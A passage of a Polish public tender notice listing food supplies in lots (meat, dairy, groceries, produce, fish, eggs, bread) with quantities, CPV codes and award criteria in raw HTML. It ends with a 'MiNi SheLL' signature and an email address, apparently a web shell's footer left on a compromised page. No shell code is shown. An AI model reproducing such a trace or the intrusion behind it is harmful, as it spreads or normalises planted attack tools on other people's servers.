10
kg
32.
Pasztet drobiowy 50 g
500
szt.
33.
Podgardle wędzone
5
kg
34.
Pasztet pieczony
40
kg
35.
Słonina
5
kg
36.
Szynka wieprzowa gotowana
40
kg
37.
Parówki drobiowe
50
kg
38.
Szynka łopatkowa
10
kg
39.
Szynka staropolska
20
kg
40.
Szynka wiejska wieprzowa
20
kg
41.
Szynka delikatesowa
10
kg
42.
Szynka konserwowa wieprzowa
50
kg
43.
Golonka prasowana
10
kg
44..
Kiełbasa zwyczajna
50
kg
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9, 15131130-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizacji zamówienia</td><td>30</td></tr><tr><td>Termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Artyuły nabiałowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.
Jogurt owocowy 150g
1000
szt.
2.
Jogurt Mia mu/mix/ 125 g
1000
szt.
3.
Jogurt naturalny  150 g
500
szt.
4.
Jogurt naturalny niskotłuszczowy
250 g
20
szt.
5.
Jogurt owocowy light 200 g
50
szt.
6.
Kefir 5 kg
40
szt.
7.
Kefir   350 g
200
szt.
8.
Mleko karton 1 l  3,2%
2000
szt.
9.
Mleko świeże (luz) 2,5 %
2000
l
10.
Śmietana 18% 400 g
800
szt.
11.
Śmietana 12% 200 g
10
szt.
12.
Śmietanka 30%  1 l
250
szt.
13.
Margaryna mleczna 250 g
350
szt.
14.
Masło 82% tłuszczu 200 g
2000
szt.
15.
Masło śmietankowe 200 g
10
szt.
16.
Masło jogurtowe 200 g
10
szt.
17.
Serek( typu Tartare)20 g
500
szt.
18.
Serek( typu Twój smak) 125 g
10
szt.
19.
Serek( typu Kiri) 100 g
100
szt.
20.
Ser topiony plastry 140 g
20
szt.
21.
Serek homogenizowany (typu Darek) 135 g
1500
szt.

22.
Ser topiony light (najmniejsza zawartość tłuszczu)150 g
10
szt.

23.
Serek ( typu Wiejski ) 150 g
30
szt.

24.
Ser twarogowy półtłusty
400
kg

25.
Ser twarogowy chudy
10
kg

26.
Ser topiony kostka 100 g
50
szt.

27.
Bryndza 120 g
30
szt.

28.
Maślanka
30
l

29.
Serek (typu Fromage) 100 g
20
szt.

30.
Ser topiony krążki 150 g
50
szt.

31
Ser  (typu Feta) 12% 270g
20
szt.

32.
Ser żółty(typu Salami)
150
kg

33.
Ser żółty (typu Edamski)
60
kg

34.
Ser żółty(typuGouda)
60
kg

35.
Ser żółty (typuDziurawiec)
60
kg

36.
Ser żółty (typu Podlaski)

20
kg

37.
Ser żółty(typuWiejski wędzony)
20
kg

38.
Ser żółty (typu Ementaler)
30
kg

39.
Ser żółty z niską zawartością tłuszczu  - do 35%
5
kg

40.




Mleko odtłuszczone 0% tłuszczu
10
l

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15510000-6, 15551300-8,
                    15544000-3,
                    15530000-2,
                    15551000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizacji zamówienia</td><td>30</td></tr><tr><td>Termin płatności faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Artykuły sypkie, przyrawy i przetwory<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.
Ananas w syropie  565 g
30
szt.
2.
Bazylia 10 g
50
szt.
3.
Barszcz czerwony koncentrat 250 ml
20
szt.
4.
Chrzan tarty(typu Polonaise)180 g
30
szt.
5.
Cukier kryształ
1200
kg
6.
Cukier puder
70
kg
7.
Cukier waniliowy 30 g
100
szt.
8.
Cynamon 20 g
50
szt.
9.
Czosnek granulowany 1000 g
10
szt.
10.
Dżem porcjowany 25 g mix(typu Tymbark)
2500
szt.
11.
Dżem słoik 280 g /mix/ typu Łowicz
150
szt.
12.
Galaretka owocowa 75 g/mix/
typu Winiary
500
szt.
13.
Groszek konserw.(typu Pudliszki) 400 g
40
szt.
14.
Grzyby- pieczarki marynowane 0,8 l
20
szt.
15.
Herbata indyjska 80 g
100
szt.
16.
Herbata ekspresowa(typu Golden assam) 100 szt.
50
szt.
17.
Jabłko prażone 0,9 l
100
szt.
18.
Kukurydza konserwowa (typuPudliszki) 400 g
100
szt.
19.
Kasza jęczmienna mazurska
80
kg
20.
Kakao (typu Decco moreno) 200 g
40
szt.
21.
Kawa  naturalna rozpuszczalna(typu Nescaffe clasic) 200g
30
szt.
22
Kwasek cytrynowy 20 g
150
szt.
23.
Ketchup łagodny (typuRoleski) 450 g
150
szt.
24.
Przyprawa do potraw (typu Kucharek) 1kg
100
szt.
25.
Kminek 30 g
10
szt.
26.
Budyń śmietankowy 38 g bez cukru typu Winiary
50
szt.
27.
Koper solony 180 g
30
szt.
28.
Liść laurowy 125 g
1
szt.
29.
Mąka ziemniaczana
40
kg
30.
Mąka pszenna  poznańska
700
kg
31.
Makaron łazanki małe  (typu Lubella)
100
kg
32.
Makaron gwiazdki(typu Lubella)
50
kg
33.
Makaron muszelki małe (typu Lubella)
100
kg
34.
Makaron spaghetti(typuLubella)
70
kg
35.
Makaron świderki(typuLubella)
200
kg
36.
Makaron nitki(typu Czarniecki)
200
kg
37.
Makaron zacierka 250 g
300
szt.
38.
Musztarda(typu Roleski) 450 g
80
szt.
39.
Majonez (typu Roleski) 0, 9 l
70
szt
40.
Maggi typu  Winiary
1 l
120
szt.
41.
Majeranek 7 g
100
szt.
42.
Miód naturalny 15 g

400
szt.
43.
Oregano 10

30
szt.
44.
Ogórki konserwowe (typu Roleski)0,9 l
50
szt.
45.
Olej uniwersalny 5 l
120
szt.
46.
Ocet winny 225 ml
10
szt.
47.
Przecier pomidorowy typu(Złoty bażant) 800 g
80
szt.
48.
Przecier pomidorowy(typu Złoty bażant) 400 g
50
szt.
49.
Papryka konserwowa( typuRoleski) 0,9 l
20
szt.
50.
Płatki zbożowe(typu Choco cool) 1000 g
50
szt.
51.
Płatki kukurydziane (typu Nestle) 1000 g
70
szt.
52.
Ciastka Belvita sniadanie mix 50 g
500
szt.
53.
Ryż biały (typu Sonko)
300
kg
54.
Sól
170
kg
55.
Syrop malinowy 1 l typu Paola
15
szt.
56.
Sos  ogrodowy, sałatkowy (typu Knorr) 700 g
5
szt.
57.
Sos bolognase(typu Knorr) 1000 g
3
szt.
58.
Susz warzywny 100 g
70
szt.
59.
Płatki owsiane  górskie 500 g ekstra
40
kg
60.
Kisiel mix typu Winiary 77 g  z cukrem
300
szt.

61.
Pieprz naturalny czarny 500 g
20
szt.
62.
Ziele angielskie 400 g
8
szt.
63.
Żurek (typuŚląski) 0,5 l
60
szt.
64.
Ocet spirytusowy 10 %
0,5 l
10
szt.
65.
Rodzynki sułtańskie 100  g
50
szt.
66.
Sok w kartonie 1 l Tymbark mix
1300
szt.
67.
Kotlety sojowe 100 g

30
szt.
68.
Przyprawa do drobiu  1 kg
10
szt.
69.
Papryka w proszku 1000g ostra/łagodna
6
szt.
70.

Woda mineralna 0,5 l niegazowana
300
szt.
71.
Wafle ryżowe 130 g (typu Sonko)
100
szt.
72.
Woda mineralna 1,5 l niegazowana
800
szt.
73.
Kawa zbożowa Inka  150 g
50
szt.
74.
Suszone morele  luz
10
kg
75.
Suszone śliwki(typukalifornijskie) 150 g
100
szt.
76.
Orzechy włoskie łuskane luz
10
kg
77.
Miód wielokwiatowy 1 l
20
szt.
78.
Tuńczyk w oleju 175 g
200
szt.
79.
Kasza kukurydziana
20
kg
80.
Konserwa rybna w sosie pomidorowym  170 g (szprot)
100
szt.
81.
Herbata owocowa
40
szt.
82.
Kasza manna

50
kg
83.
Konserwa rybna w oleju  170 g (szprot)
110
szt.
84.
Zioła prowansalskie 10 g
10
szt.
85.
Tymianek 10 g

30
szt.
86.
Szczaw w słoiku 180 g
5
szt.
87.
Herbatniki bebe/48 szt.w opakowaniu/
70
szt.
88.

Sok Kubuś mix 0,9 l


1000

szt.
89.

Drożdże 100 g

100
szt.
90.
Wafle  w czekoladzie -  Grześki 36 g
200
szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizacji zamówienia</td><td>30</td></tr><tr><td>Termin płatności faktury</td><td>10</td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>Owoce, warzywa, mrożonki, ryby i jajka.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.
Brzoskwinie
70
kg
2.
Banany
800
kg
3.
Botwina
20
szt.
4.
Buraki czerwone
500
kg
5.
Cebula
200
kg
6.
Cytryny
100
kg
7.
Fasola Jaś średni
30
kg
8.
Fasola szparagowa
50
kg
9.
Fasola szparagowa mrożona
100
kg
10.
Groch łuszczony
30
kg
11.
Grzyby pieczarki
80
kg
12.
Jabłka
700
kg
13.
Jaja kurze XL kl.I
10000
szt.
14.
Kapusta biała
400
kg
15.
Kapusta czerwona
130
kg
16.
Kapusta włoska
30
szt.
17.
Kapusta pekińska
130
szt.
18.
Kapusta kwaszona
250
kg
19.
Kalafior
50
szt.
20.
Kalafior mrożony
50
kg
21.
Koper zielony
500
szt.
22.
Marchew korzeniowa
800
kg
23.
Mandarynki
200
kg
24.
Mieszanka warzywna (bukiet z warzyw)
150
kg
25.
Marchew z groszkiem mrożona
50
kg
26.
Mieszanka kompotowa mrożona
150
kg
27.
Ogórki zielone
300
kg
28.
Ogórki kwaszone
150
kg
29.
Pomidory
400
kg
30.
Pory
70
szt.
31.
Papryka czerwona
50
kg
32.
Pietruszka zielona
400
szt.
33.
Pietruszka korzeń
100
kg
34.
Rzodkiewka
70
szt.
35.
Ryba  filet mrożony z mintaja ( płaty)
100
kg
36.
Szpinak mrożony
60
kg
37.
Seler korzeniowy
200
kg
38.
Sałata zielona
250
szt.
39.
Szczypiorek
180
szt.
40.
Ziemniaki
6000
kg
41.
Truskawki mrożone
150
kg
42.
Arbuz
200
kg
43.
Ryba  filet mrożony z dorsza
80
kg
44.
Truskawka

100
kg
45.
Maliny
20
kg
46.
Pomarańcze
200
kg
47.
Nektarynki

100
kg
48.
Winogrona białe
100
kg
49.
Kiwi
600
szt.
50.
Śliwki
80
kg
51.
Gruszki

300
kg
52.
Sałata lodowa
60
szt.
53.
Brokuły
20
szt.
54.
Morele
50
kg
55.
Czosnek polski
100
szt.
56.
Ryba - filet mrożony z tilapi
200
kg
57.
Brokuły mrożone
50
kg
58.

Groszek zielony mrożony

60
kg
59.
Aronia  mrożona

70
kg
60.




Porzeczka czarna  mrożona


70
kg
61.


Śliwki  mrożone

80
kg
62.
Wiśnie mrożone
80
kg
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03220000-9, 15896000-5,
                    15221000-3,
                    03142500-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizacji zamówienia</td><td>30</td></tr><tr><td>Termin płatności faktury</td><td>10</td></tr><tr><td></td><td></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>Pieczywo<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.
Bułka kajzerka 50 g
3000
szt.
2.
Bułka zwykła 80 g
500
szt.
3.
Bułka graham   80 g
200
szt.
4.
Bułka wieloziarnista 80 g
500
szt.
5.
Bułka sztanga 60 g
700
szt.
6.
Bułka śniadaniowa 40 g
500
szt.
7.
Chleb pszenno  żytni krojony  600 g
1000
szt.
8.
Chleb pszenny krojony 600 g
800
szt.
9.
Chleb wieloziarnisty krojony 500 g
500
szt.
10.
Chleb razowy krojony  400 g
100
szt.
11.
Chleb dworski krojony 500 g
400
szt.
12.
Chleb żytni krojony 500 g
200
szt.
13.
Chleb graham krojony  600 g

500
szt.
14.
Weka krojona  400 g

250
szt.
15.
Bułka tarta
150
kg
16.
Chałka 500 g
50
szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas realizaji zamówienia</td><td>30</td></tr><tr><td>Termin płatości faktury</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com